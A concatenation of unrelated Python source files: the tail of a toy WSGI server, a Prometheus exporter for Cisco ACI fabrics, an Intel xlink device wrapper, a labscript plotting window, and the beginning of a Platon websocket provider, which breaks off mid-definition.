file_name = re.match(r"\w+ +(/[^ ]*) ", request_start_line.decode("utf-8")).group(1)
method = re.match(r"(\w+) +/[^ ]* ", request_start_line.decode("utf-8")).group(1)
env = {
"PATH_INFO": file_name,
"METHOD": method
}
response_body = self.app(env, self.start_response)
response = self.response_headers + "\r\n" + response_body
# Send the response back to the client
client_socket.send(bytes(response, "utf-8"))
# Close the client connection
client_socket.close()
def bind(self, port):
self.server_socket.bind(("", port))
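# Illustrative sketch (not part of MyWebFramework): the smallest application this
# server can drive. It must accept the env dict built in handle_client (PATH_INFO,
# METHOD) plus a start_response callable, call start_response with a status line
# and a header list, and return the response body as a str.
# def demo_app(env, start_response):
#     start_response("200 OK", [("Content-Type", "text/plain")])
#     return "Hello from %s %s" % (env["METHOD"], env["PATH_INFO"])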
def main():
sys.path.insert(1, WSGI_PYTHON_DIR)
if len(sys.argv) < 2:
sys.exit("python MyWebServer.py Module:app")
# python MyWebServer.py MyWebFrameWork:app
module_name, app_name = sys.argv[1].split(":")
# module_name = "MyWebFrameWork"
# app_name = "app"
m = __import__(module_name)
app = getattr(m, app_name)
http_server = HTTPServer(app)
# http_server.set_port
http_server.bind(8000)
http_server.start()
if __name__ == "__main__":
main()
|
prometheus_aci_exporter.py
|
#!/usr/bin/env python3
import argparse
from http.server import BaseHTTPRequestHandler, HTTPServer
from itertools import chain
import logging
import re
import signal
from socketserver import ThreadingMixIn
from threading import Thread
import time
from typing import Any, Callable, Dict, Iterable, List, Optional, Pattern, Union
import urllib.parse as up
import requests
import yaml
RealNumber = Union[int, float]
JsonType = Union[None, str, int, float, bool, List['JsonType'], Dict[str, 'JsonType']]
DEFAULT_PORT = 9377
DEFAULT_TIMEOUT = 10
APIC_COOKIE_NAME = "APIC-cookie"
PROM_METRIC_NAME_RE = re.compile("^[a-zA-Z_:][a-zA-Z0-9_:]*$")
PROM_LABEL_NAME_RE = re.compile("^[a-zA-Z_][a-zA-Z0-9_]*$")
LOGGER = logging.getLogger("prometheus_aci_exporter")
class Metric:
def __init__(self, metric_name, metric_type, help_text=None, label_keys=None):
if label_keys is None:
label_keys = ()
if PROM_METRIC_NAME_RE.match(metric_name) is None:
raise ValueError(f"invalid metric_name {metric_name!r} (must match {PROM_METRIC_NAME_RE.pattern!r})")
for key in label_keys:
if PROM_LABEL_NAME_RE.match(key) is None:
raise ValueError(f"invalid entry {key!r} in label_keys (must match {PROM_LABEL_NAME_RE.pattern!r})")
self.metric_name = metric_name
self.metric_type = metric_type
self.help_text = help_text
self.label_keys = tuple(label_keys)
self.unit = None
self._values = []
def add_value(self, value, label_values=None, timestamp=None):
# timestamp: seconds since Unix epoch (or None)
if label_values is None:
label_values = ()
label_values = tuple(label_values)
if len(label_values) != len(self.label_keys):
raise ValueError(f"len(label_values) ({len(label_values)}) does not equal len(self.label_keys) ({len(self.label_keys)})")
self._values.append((value, timestamp, label_values))
@staticmethod
def sanitize_help_text(help_text):
return help_text.replace("\\", "\\\\").replace("\n", "\\n")
@staticmethod
def escape_label_value(lbl_val):
ret = []
for c in lbl_val:
if c == '\\':
ret.append('\\\\')
elif c == '"':
ret.append('\\"')
elif c == '\n':
ret.append('\\n')
else:
ret.append(c)
return "".join(ret)
@staticmethod
def quote_label_value(lbl_val):
return f'"{Metric.escape_label_value(lbl_val)}"'
def generate(self, fmt='prometheus'):
if fmt not in ('prometheus', 'openmetrics'):
raise ValueError(f"unknown format: {fmt!r}")
lines = []
metric_type = (
self.metric_type
if self.metric_type in ("counter", "gauge", "histogram", "summary")
else "untyped"
)
metric_name, metric_name_tail = self.metric_name, ""
if metric_type == 'counter' and fmt != 'prometheus':
if metric_name.endswith("_total"):
metric_name = metric_name[:-len("_total")]
metric_name_tail = "_total"
lines.append(f"# TYPE {metric_name} {metric_type}")
if self.help_text is not None:
if fmt == 'prometheus':
help_text_sanitized = self.help_text.replace("\\", "\\\\").replace("\n", "\\n")
else:
help_text_sanitized = Metric.escape_label_value(self.help_text)
lines.append(f"# HELP {metric_name} {help_text_sanitized}")
if self.unit is not None and fmt != 'prometheus':
lines.append(f"# UNIT {metric_name} {self.unit}")
for val, tstamp, lbl_vals in self._values:
ob, cb = '{', '}'
line_pieces = [metric_name, metric_name_tail]
lbl_kvps = [
f"{k}={Metric.quote_label_value(v)}"
for (k, v)
in sorted(zip(self.label_keys, lbl_vals))
]
if lbl_kvps:
line_pieces.append(f"{ob}{','.join(lbl_kvps)}{cb}")
line_pieces.append(f" {val}")
if tstamp is not None:
if fmt == 'prometheus':
# milliseconds instead of seconds
tstamp *= 1000
line_pieces.append(f" {tstamp}")
lines.append("".join(line_pieces))
return "".join(f"{ln}\n" for ln in lines)
class AciSession(object):
def __init__(self, controller: str) -> None:
self.controller: str = controller
self.timeout: RealNumber = DEFAULT_TIMEOUT
self.auth_user: Optional[str] = None
self.auth_token: Optional[str] = None
self.tls_verify: Union[str, bool] = False
def auth(self, auth_config: Dict[str, JsonType]) -> None:
# TODO: certificate auth
controller_ca_cert = auth_config.get('controller_ca_cert', None)
if controller_ca_cert is not None:
self.tls_verify = controller_ca_cert
auth_payload = {
"aaaUser": {
"attributes": {
"name": auth_config['username'],
"pwd": auth_config['password']
}
}
}
response = requests.post(
f"https://{self.controller}/api/aaaLogin.json",
json=auth_payload,
timeout=self.timeout,
verify=self.tls_verify
)
response.raise_for_status()
self.auth_user = auth_config['username']
self.auth_token = response.cookies[APIC_COOKIE_NAME]
def logout(self) -> None:
if self.auth_user is None:
return
logout_payload = {
"aaaUser": {
"attributes": {
"name": self.auth_user,
}
}
}
response = requests.post(
f"https://{self.controller}/api/aaaLogout.json",
json=logout_payload,
cookies={APIC_COOKIE_NAME: self.auth_token},
timeout=self.timeout,
verify=self.tls_verify,
)
response.raise_for_status()
self.auth_user = None
self.auth_token = None
def obtain_instances(
self, class_name: str, filter_string: Optional[str] = None,
scope: str = "self"
) -> Dict[str, JsonType]:
escaped_class = up.quote(class_name)
query_options = {
"query-target": scope,
}
if filter_string is not None:
query_options['query-target-filter'] = filter_string
response = requests.get(
f"https://{self.controller}/api/class/{escaped_class}.json",
params=query_options,
cookies={APIC_COOKIE_NAME: self.auth_token},
timeout=self.timeout,
verify=self.tls_verify
)
response.raise_for_status()
return response.json()
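# Illustrative request shape (class name and filter are made-up examples):
# obtain_instances("fvTenant", 'eq(fvTenant.name,"common")', "self") performs
#   GET https://<controller>/api/class/fvTenant.json
#       ?query-target=self&query-target-filter=eq(fvTenant.name,"common")
# sending the APIC-cookie obtained by auth(), and returns the decoded JSON,
# whose instances live under the "imdata" key.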
class AciCollector(object):
def __init__(self, config: Dict[str, JsonType]) -> None:
self.config: Dict[str, JsonType] = config
self.pending_config: Optional[Dict[str, JsonType]] = None
self.timeout: RealNumber = DEFAULT_TIMEOUT
self.regex_cache: Dict[str, Pattern] = {}
def collect(self) -> Iterable[Metric]:
if self.pending_config is not None:
self.config = self.pending_config
self.pending_config = None
scrape_duration_metric = Metric(
'aci_scrape_duration_seconds',
'gauge',
'The duration, in seconds, of the last scrape of the fabric.',
label_keys=('fabric',)
)
common_queries = self.config.get('common_queries', dict())
for fabric_name, fabric in self.config['fabrics'].items():
time_start = time.perf_counter()
# try each controller in turn
working_index = None
for i, controller in enumerate(fabric['controllers']):
try:
yield from self.collect_fabric(fabric_name, fabric, controller, common_queries)
working_index = i
break
except requests.exceptions.Timeout:
# try the next controller
pass
time_end = time.perf_counter()
# reorder controllers?
if working_index is not None and working_index > 0:
# yes
cur_ctrls = fabric['controllers']
fabric['controllers'] = cur_ctrls[working_index:] + cur_ctrls[:working_index]
# note that the order is reset when the configuration is reloaded (e.g. SIGHUP)
scrape_duration_metric.add_value(time_end - time_start, (fabric_name,))
yield scrape_duration_metric
def collect_fabric(
self, fabric_name: str, fabric: Dict[str, JsonType], controller: str,
common_queries: Dict[str, JsonType]
) -> Iterable[Metric]:
session = AciSession(controller)
session.auth(fabric['auth'])
all_queries = chain(
fabric.get('queries', dict()).items(),
common_queries.items()
)
for query_name, query in all_queries:
LOGGER.debug("processing query %r", query_name)
class_name = query['class_name']
scope = query.get('scope', 'self')
filter_string = query.get('filter', None)
LOGGER.debug("class %r, scope %r, filter %r", class_name, scope, filter_string)
instances = session.obtain_instances(class_name, filter_string, scope)
LOGGER.debug("obtained %d instances", len(instances))
metric_definitions = {}
count_metric = query.get('count_metric', None)
if count_metric is not None:
LOGGER.debug("count metric (%r) defined", count_metric)
count_labels = {}
self._add_common_labels(count_labels, query, query_name, fabric_name, class_name)
count_help_text = query.get('count_metric_help_text', '')
# instance counts are always gauges
count_metric_object = Metric(
count_metric, 'gauge', count_help_text, label_keys=count_labels.keys()
)
count_metric_object.add_value(len(instances['imdata']), count_labels.values())
metric_definitions[count_metric] = count_metric_object
all_values_labels = []
for instance in instances['imdata']:
drop_instance = False
class_name = list(instance.keys())[0]
attributes = instance[class_name]['attributes']
LOGGER.debug("processing instance of class %r with DN %r", class_name, attributes['dn'])
# handle indexing
index_mode = query.get('index_mode', 'none')
index_label = query.get('index_label', None)
if index_mode == 'none':
indexes_prop_suffixes = [(-1, "")]
else:
index_max = int(attributes[query['index_max_property']])
if index_mode == 'zero_based':
indexes_prop_suffixes = [(i, f"{i}") for i in range(index_max)]
elif index_mode == 'zero_based_first_nothing':
indexes_prop_suffixes = [(i, f"{i}" if i > 0 else "") for i in range(index_max)]
elif index_mode == 'one_based':
indexes_prop_suffixes = [(i+1, f"{i+1}") for i in range(index_max)]
elif index_mode == 'one_based_first_nothing':
indexes_prop_suffixes = [(i+1, f"{i+1}" if i > 0 else "") for i in range(index_max)]
else:
raise ValueError(f"unknown index mode {index_mode!r}")
for index, prop_suffix in indexes_prop_suffixes:
LOGGER.debug("indexing: index %d, suffix %r", index, prop_suffix)
labels = {}
self._add_common_labels(labels, query, query_name, fabric_name, class_name)
for label_definition in query.get('labels', list()):
LOGGER.debug(
"processing label definition %r for attributes %r",
label_definition,
attributes,
)
updated_labels = self.process_value(attributes, label_definition)
LOGGER.debug("updated labels are %r", updated_labels)
if updated_labels is None:
drop_instance = True
break
try:
labels.update(updated_labels)
except ValueError as ex:
raise ValueError(f"failed to update labels in query {query_name!r} with {updated_labels!r}: {ex}")
if index_label is not None:
LOGGER.debug("adding index label %r=%d", index_label, index)
labels[index_label] = str(index)
if drop_instance:
LOGGER.debug("dropping instance after labels")
continue
values = {}
for value_definition in query.get('metrics', list()):
# extract the definition
metric_name = value_definition['key']
metric_type = value_definition['type']
help_text = value_definition.get('help_text', '')
metric_object = Metric(
metric_name, metric_type, help_text,
label_keys=labels.keys()
)
metric_definitions[metric_name] = metric_object
# store the value
LOGGER.debug(
"processing value definition %r for attributes %r and prop suffix %r",
value_definition,
attributes,
prop_suffix,
)
value = self.process_value(attributes, value_definition, prop_suffix)
LOGGER.debug("value is %r", value)
if value is None:
drop_instance = True
break
try:
values.update(value)
except ValueError as ex:
raise ValueError(f"failed to update values for metric {metric_name!r} in query {query_name!r} with {value!r}: {ex}")
if drop_instance:
LOGGER.debug("dropping instance after value")
continue
all_values_labels.append((values, labels))
if not all_values_labels:
continue
for values, labels in all_values_labels:
for key, value in values.items():
metric_object = metric_definitions[key]
metric_object.add_value(float(value), labels.values())
for metric_object in metric_definitions.values():
yield metric_object
session.logout()
@staticmethod
def _add_common_labels(
labels: Dict[str, str], query: Dict[str, JsonType],
query_name: str, fabric_name: str, class_name: str
) -> None:
if not query.get('omit_query_name_label', False):
labels['queryName'] = query_name
if not query.get('omit_fabric_label', False):
labels['fabric'] = fabric_name
if not query.get('omit_class_name_label', False):
labels['className'] = class_name
def process_value(
self, attributes: Dict[str, JsonType], definition: Dict[str, JsonType],
property_name_suffix: str = ""
) -> JsonType:
property_name = definition['property_name'] + property_name_suffix
const_value = definition.get('const_value', None)
if const_value is not None:
property_value = const_value
else:
property_value = attributes.get(property_name, None)
if property_value is None:
return None
# transformations?
# type conversion
type_key = definition.get('value_type', None)
if type_key is not None:
type_func = {
'str': str,
'int': int,
'float': float,
}.get(type_key, None)
if type_func is None:
raise ValueError(f"unknown type conversion function {type_func!r}")
property_value = type_func(property_value)
# range validity
invalid_below = definition.get('invalid_below', None)
clamp_bottom = definition.get('clamp_bottom', None)
if invalid_below is not None:
# convert property_value to the type of invalid_below before comparing
if type(invalid_below)(property_value) < invalid_below:
return None
elif clamp_bottom is not None:
if type(clamp_bottom)(property_value) < clamp_bottom:
property_value = clamp_bottom
invalid_above = definition.get('invalid_above', None)
clamp_top = definition.get('clamp_top', None)
if invalid_above is not None:
if type(invalid_above)(property_value) > invalid_above:
return None
if clamp_top is not None:
if type(clamp_top)(property_value) > clamp_top:
property_value = clamp_top
# regex extraction
regex_str = definition.get('regex', None)
regex_must_match = definition.get('regex_must_match', False)
if regex_str is not None:
try:
regex = self.regex_cache[regex_str]
except KeyError:
regex = re.compile(regex_str)
self.regex_cache[regex_str] = regex
match = regex.match(property_value)
if match is not None:
match_dict = match.groupdict()
property_value = {k: v if v is not None else "" for (k, v) in match_dict.items()}
elif regex_must_match:
# it didn't match, though
return None
# key renaming
key_renaming = definition.get('key_renaming', None)
if key_renaming is not None:
new_values = {}
for old_key, value in property_value.items():
new_key = key_renaming.get(old_key, old_key)
if new_key is None:
# skip this value
continue
new_values[new_key] = value
property_value = new_values
# select-case
cases = definition.get('cases', None)
if cases is not None:
for old_value, new_value in cases.items():
if property_value == old_value:
property_value = new_value
break
# key attachment (dictionarification)
key = definition.get('key', None)
if key is not None:
property_value = {key: property_value}
return property_value
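# Illustrative value definition (field names are taken from the branches above,
# the values are made up): such a dict could appear in a query's "labels" or
# "metrics" list and would be resolved by process_value() as follows:
# definition = {
#     "property_name": "dn",                     # attribute to read
#     "regex": r"topology/pod-(?P<pod>\d+)/",    # extract named groups into a dict
#     "regex_must_match": True,                  # drop the instance on mismatch
#     "key_renaming": {"pod": "podId"},          # rename extracted keys
# }
# A non-regex definition would typically carry "key" plus optional "value_type",
# "invalid_below"/"invalid_above" or "clamp_bottom"/"clamp_top".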
def load_config(config_file_name: str) -> JsonType:
with open(config_file_name, "r", encoding="utf-8") as config_file:
return yaml.safe_load(config_file)
def get_sighup_handler(
aci_collector: AciCollector, config_file_name: str
) -> Callable[[Any, Any], None]:
def handle_sighup(_signal_number, _stack_frame) -> None:
config = load_config(config_file_name)
aci_collector.pending_config = config
return handle_sighup
class MetricsHandler(BaseHTTPRequestHandler):
collector = None
args = None
def do_GET(self):
output_format = 'prometheus'
if getattr(self.args, 'web_openmetrics', False):
accept_header = self.headers.get('Accept', '')
for accepted_type in accept_header.split(','):
if accepted_type.split(';')[0].strip() == 'application/openmetrics-text':
output_format = 'openmetrics'
collector = self.collector
generated_lines = [
metric.generate(fmt=output_format).encode('utf-8')
for metric
in collector.collect()
]
self.send_response(200)
if output_format == 'prometheus':
self.send_header('Content-Type', 'text/plain; version=0.0.4; charset=utf-8')
else:
self.send_header('Content-Type', 'application/openmetrics-text; version=0.0.1; charset=utf-8')
self.end_headers()
for line in generated_lines:
# lines are already terminated appropriately
self.wfile.write(line)
if output_format != 'prometheus':
self.wfile.write(b'# EOF\n')
def log_message(self, format, *args):
return
@classmethod
def factory(cls, collector, args):
cls_name = str(cls.__name__)
CustomizedMetricsHandler = type(
cls_name,
(cls, object),
{"collector": collector, "args": args}
)
return CustomizedMetricsHandler
class ThreadingSimpleHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
def start_http_server(collector, port, addr='', args=None):
CustomMetricsHandler = MetricsHandler.factory(collector, args)
server = ThreadingSimpleHTTPServer((addr, port), CustomMetricsHandler)
server_thread = Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
LOGGER.info("listening on %s:%d", addr, port)
def main() -> None:
parser = argparse.ArgumentParser()
parser.add_argument("--config.file", dest="config_file", default="aci.yml")
parser.add_argument("--web.listen-port", dest="web_listen_port", type=int, default=DEFAULT_PORT)
parser.add_argument("--web.listen-address", dest="web_listen_address", type=str, default="")
parser.add_argument("--web.openmetrics", dest="web_openmetrics", action="store_true")
parser.add_argument(
"--log.level", dest="log_level",
choices=("DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"),
default="INFO",
)
args = parser.parse_args()
log_level = getattr(logging, args.log_level)
logging.basicConfig(
level=log_level,
)
config = load_config(args.config_file)
aci_collector = AciCollector(config)
hup = getattr(signal, 'SIGHUP', None)
if hup is not None:
sighup_handler = get_sighup_handler(aci_collector, args.config_file)
signal.signal(hup, sighup_handler)
start_http_server(aci_collector, args.web_listen_port, args.web_listen_address, args)
while True:
time.sleep(9001)
if __name__ == '__main__':
main()
|
xlink_wrapper.py
|
"""
Allows API of xlink driver C library to be called in Python.
Copyright (C) 2019-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import threading
import os
from typing import Callable, Optional
from ctypes import *
import time
from inbm_vision_lib.constants import XLINK_LIB_PATH, MAXIMUM_STORE_FILE_SIZE, XLINK_DATA_SIZE, \
XLINK_FILE_TRANSFER_RATE, NODE_BUFFER_TIMEOUT, VISION_BUFFER_TIMEOUT
from threading import Lock
from ..constants import VISION
from .ixlink_wrapper import IXlinkWrapper
from .ixlink_wrapper import HOST_DEVICE, PCIE, X_LINK_SUCCESS
from .ixlink_wrapper import xlink_global_handle, xlink_handle
logger = logging.getLogger(__name__)
class XlinkWrapper(IXlinkWrapper):
"""Wrapper class to use xlink shared library
@param receive_callback: Callback for receiving messages over xlink
@param channel_id: Channel used for xlink communication
@param pcie_num: PCIE number used in connection
@param is_boot_dev: true if xlink boot device API to be called
"""
def __init__(self, receive_callback: Callable, channel_id: int, pcie_num: int, is_boot_dev: bool,
async_cb: Optional[Callable] = None):
super().__init__(XLINK_LIB_PATH,
receive_callback,
channel_id,
xlink_global_handle(prof_cfg=PCIE),
XLINK_DATA_SIZE,
xlink_handle(dev_type=HOST_DEVICE),
pcie_num,
async_cb)
self._xlink_handler.sw_device_id = self._xlink_pcie_num
self._is_boot_dev = is_boot_dev
self._open_channel_lock = Lock()
self._read_data_lock = Lock()
self._write_lock = Lock()
self.init_thread = threading.Thread(target=self._init_channel)
self.init_thread.start()
self._listen_thread = threading.Thread(target=self._listen_to_channel)
self._listen_thread.daemon = True
def _init_channel(self):
"""Initialize Xlink handler, connect the handler and open channel"""
logger.debug(f'{self._agent} start Xlink initialization.')
self.xlink_init_status_success = False
while self._running:
status = self._xlink_library.xlink_initialize()
if status is X_LINK_SUCCESS:
break
time.sleep(1)
logger.debug(f"PCIE Number: {self._xlink_pcie_num}")
if self._is_boot_dev:
self.boot_device()
xlink_handler_p = byref(self._xlink_handler)
logger.debug('xlink_connect start connecting... Waiting the connection...')
while self._running:
status = self._xlink_library.xlink_connect(xlink_handler_p)
if status is X_LINK_SUCCESS:
logger.debug('xlink_connect pass.')
logger.debug('xlink_open_channel. Channel ID - ' + str(self._channel_id.value))
break
logger.debug('xlink_connect start connecting... Waiting the connection...')
time.sleep(1)
if self._async_cb:
self._register_async_callback()
while self._running:
if self._open_channel_lock.acquire():
timeout = VISION_BUFFER_TIMEOUT if self._agent == VISION else NODE_BUFFER_TIMEOUT
try:
status = self._xlink_library.xlink_open_channel(xlink_handler_p, self._channel_id,
self._operation_type,
self._data_size, timeout * 1000)
finally:
self._open_channel_lock.release()
if status is X_LINK_SUCCESS:
logger.debug('xlink_open_channel pass. Channel ID - ' +
str(self._channel_id.value))
# Wait 5 seconds for xlink to stabilize
time.sleep(5)
self.xlink_init_status_success = True
logger.info('Xlink initialization complete.')
break
else:
pass
time.sleep(1)
def get_xlink_device_status(self) -> int:
""" Check the xlink device status.
XLINK_DEV_OFF = 0, // device is off
XLINK_DEV_ERROR, // device HW failure is detected
XLINK_DEV_BUSY, // device is busy and not available
XLINK_DEV_RECOVERY, // device is in recovery mode
XLINK_DEV_READY // device is available for use
@return: status of xlink device
"""
device_status = c_int(0)
# logger.debug('Call xlink get device status for {0}'.format(
# str(self._xlink_handler.sw_device_id)))
if self._running:
status = self._xlink_library.xlink_get_device_status(
byref(self._xlink_handler), byref(device_status))
if status is not X_LINK_SUCCESS:
logger.error('xlink_get device status failed - %s', str(status))
device_status = c_int(-1)
else:
logger.debug('Closing xlink in progress. Will not disrupt it.')
device_status.value = 4
logger.debug('xlink device status for {} is {}'.format(
str(self._xlink_handler.sw_device_id), str(device_status.value)))
return device_status.value
def boot_device(self) -> None:
""" Call xlink API to boot the device.
Only the IA vision-agent boots the device; booting the VPU FW from the node is not supported at this stage.
"""
super().boot_device()
def reset_device(self) -> None:
"""Call xlink API to reset the device"""
super().reset_device()
def _register_callback(self) -> None:
"""Register dummy callback to the xlink"""
dummy_callback = c_void_p()
status = self._xlink_library.xlink_data_available_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
status = self._xlink_library.xlink_data_consumed_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
logger.debug("xlink callback registered.")
def _listen_to_channel(self):
"""Listen the channel and waiting for incoming message"""
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
# Wait for xlink initialization to complete
while self._running and not self.xlink_init_status_success:
time.sleep(1)
while self._running:
size = c_uint32(0)
while self._running and size.value == 0 and self._read_data_lock.acquire():
try:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
time.sleep(0.1)
finally:
self._read_data_lock.release()
if size.value != 0:
logger.info('Received message size ' + str(size.value) + '. Message is:')
message_combined = ''
for i in range(size.value):
message_combined = message_combined + \
message[i].decode('utf-8') # type: ignore
if i == (int(size.value) - 1):
logger.info('%s', str(message_combined))
self._xlink_release_data()
if self._receive_callback is not None:
logger.info('Receive callback method exist. Call the method.')
# Use threading to speed up message handling so that it can speed up xlink_read_data
# process.
handle_thread = threading.Thread(target=self._receive_callback, args=(message_combined,))
handle_thread.daemon = True
handle_thread.start()
def receive_file(self, file_save_path: str) -> str:
"""Receive update file and save it to the local repository.
@param file_save_path: local path to save the update file
@return : (str) received file name
"""
super()._check_directory(file_save_path)
logger.debug("Switch to receive file mode.")
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(0)
# Receive file name
while size.value == 0:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
file_name = ""
for i in range(size.value):
file_name = file_name + message[i].decode('utf-8') # type: ignore
self._xlink_release_data()
file_path = os.path.join(file_save_path, file_name)
# Receive number of chunk
size = c_uint32(0)
while size.value == 0:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
chunk_message = ""
for i in range(size.value):
chunk_message = chunk_message + message[i].decode('utf-8') # type: ignore
num_of_chunk = int(chunk_message)
self._xlink_release_data()
# Receive update file
logger.info("Receiving file. Please wait......")
# Reset size for receiving file
with open(file_path, 'wb') as update_file:
if num_of_chunk > 1:
file_collect = b''
for num in range(num_of_chunk):
logger.info("{}/{}".format(num, num_of_chunk - 1))
size = c_uint32(0)
while size.value == 0:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
file_collect = file_collect + message[:size.value] # type: ignore
# Write to file if file stored in memory larger than the limit or it is the last chunk of file.
if len(file_collect) > MAXIMUM_STORE_FILE_SIZE or num == (num_of_chunk - 1):
logger.debug("write to file")
update_file.write(file_collect) # type: ignore
update_file.flush()
file_collect = b''
if num != (num_of_chunk - 1):
self._xlink_release_data()
else:
size = c_uint32(0)
while size.value == 0:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
for i in range(size.value):
# Temporary disable the progress bar as it causes slowness in simics.
# progress = receive_file_progress(i, int(size.value))
# if progress:
# logger.info("Receiving file size " + str(progress) + "%")
update_file.write(message[i]) # type: ignore
self._xlink_release_data()
logger.info("Receiving file size 100%.")
logger.info("Receive file complete. File size: %i", os.path.getsize(file_path))
logger.info("File stored at: %s", file_path)
return file_name
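# Note on the transfer protocol (inferred from the reads above): the sender is
# expected to write three things in order on this channel -- the file name, the
# number of chunks as a decimal string, and then the file payload split into that
# many chunks; completed reads are handed back via _xlink_release_data().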
def get_init_status(self) -> bool:
""" Get the initialization status
@return: boolean representing initialization status
"""
return self.xlink_init_status_success
def start(self) -> None:
"""start to listen the receive channel"""
self._listen_thread.start()
def send(self, message) -> None:
"""Send the message through xlink write data API
@param message: message to be sent
"""
# Wait for xlink initialization to complete
while self._running and not self.get_init_status():
time.sleep(1)
if self.get_init_status() and self._running:
logger.debug('Sending message: ' + str(message))
while self._running and self._write_lock.acquire():
try:
status = self._xlink_library.xlink_write_data(byref(self._xlink_handler), self._channel_id,
message.encode('utf8'),
len(message.encode('utf8')))
super()._check_status(status, 'XLinkWriteData data failed.')
finally:
self._write_lock.release()
break
else:
logger.info('Stop XLinkWriteData')
def receive(self, message: str) -> None:
"""Receive message"""
pass
def send_file(self, file_path: str) -> None:
# inherit docstring from superclass
while self._running and self._write_lock.acquire():
try:
super().write_file_via_unsecured(file_path)
finally:
self._write_lock.release()
break
def stop(self, disconnect: bool = False) -> None:
# inherit docstring from superclass
logger.debug('Stopping Xlink.')
self._running = False
while not self._open_channel_lock.acquire():
time.sleep(0.1)
logger.debug('Open channel lock get.')
while not self._read_data_lock.acquire():
time.sleep(0.01)
logger.debug('read_data lock get.')
time.sleep(1)
logger.debug('Close Xlink channel ID - ' + str(self._channel_id.value))
self._xlink_library.xlink_close_channel(byref(self._xlink_handler), self._channel_id)
if disconnect:
# Wait 0.5s to let xlink fully close the channel before disconnecting it.
time.sleep(0.5)
logger.debug('Disconnect Xlink')
self._xlink_library.xlink_disconnect(byref(self._xlink_handler))
|
InputPlotWindow.py
|
from __future__ import division, unicode_literals, print_function, absolute_import
from zprocess import Process
import pyqtgraph as pg
import numpy as np
from qtutils import inmain_decorator
import qtutils.qt.QtGui as QtGui
import zmq
from labscript_utils.labconfig import LabConfig
import threading
from labscript_utils import PY2
if PY2:
memoryview = buffer
# maximum amount of datapoints to be plotted at once
MAX_DATA = 1000
class PlotWindow(Process):
def run(self, connection_name, hardware_name, device_name):
self._connection_name = connection_name
self._hardware_name = hardware_name
self._device_name = device_name
self.data = np.array([], dtype=np.float64)
if self._connection_name != '-':
title = "{} ({})".format(self._hardware_name, self._connection_name)
else:
title = "{}".format(self._hardware_name)
self.plot_win = pg.plot([], title=title)
broker_pub_port = int(LabConfig().get('ports', 'BLACS_Broker_Pub'))
context = zmq.Context()
self.socket = context.socket(zmq.SUB)
self.socket.connect("tcp://127.0.0.1:%d" % broker_pub_port)
self.socket.setsockopt(zmq.SUBSCRIBE, "{} {}\0".format(self._device_name, self._hardware_name).encode('utf-8'))
self.analog_in_thread = threading.Thread(target=self._analog_read_loop)
self.analog_in_thread.daemon = True
self.analog_in_thread.start()
self.cmd_thread = threading.Thread(target=self._cmd_loop)
self.cmd_thread.daemon = True
self.cmd_thread.start()
QtGui.QApplication.instance().exec_()
self.to_parent.put("closed")
def _analog_read_loop(self):
while True:
devicename_and_channel, data = self.socket.recv_multipart()
self.update_plot(np.frombuffer(memoryview(data), dtype=np.float64))
def _cmd_loop(self):
while True:
cmd = self.from_parent.get()
if cmd == 'focus':
self.setTopLevelWindow()
@inmain_decorator(False)
def setTopLevelWindow(self):
self.plot_win.win.activateWindow()
self.plot_win.win.raise_()
@inmain_decorator(False)
def update_plot(self, new_data):
if self.data.size < MAX_DATA:
if new_data.size + self.data.size <= MAX_DATA:
self.data = np.append(self.data, new_data)
else:
if new_data.size < MAX_DATA:
self.data = np.roll(self.data, -new_data.size)
self.data[self.data.size - new_data.size:self.data.size] = new_data
else:
self.data = new_data[new_data.size - MAX_DATA:new_data.size]
else:
if new_data.size <= self.data.size:
self.data = np.roll(self.data, -new_data.size)
self.data[self.data.size - new_data.size:self.data.size] = new_data
else:
self.data = new_data[new_data.size - self.data.size:new_data.size]
self.plot_win.plot(self.data, clear=True)
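# The branches above implement a rolling window of at most MAX_DATA samples.
# An equivalent sketch of the same behaviour with plain NumPy (illustrative only,
# not used by this module):
# self.data = np.concatenate((self.data, new_data))[-MAX_DATA:]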
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Optional,
Type,
Union,
)
from platon_typing import (
URI,
)
from websockets.client import (
connect,
)
from websockets.legacy.client import (
WebSocketClientProtocol,
)
from platon.exceptions import (
ValidationError,
)
from platon.providers.base import (
JSONBaseProvider,
)
from platon.types import (
RPCEndpoint,
RPCResponse,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint() -> URI:
return URI(os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546'))
class PersistentWebSocket:
def __init__(
self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
) -> None:
self.ws: WebSocketClientProtocol = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self) -> WebSocketClientProtocol:
if self.ws is None:
self.ws = await connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(
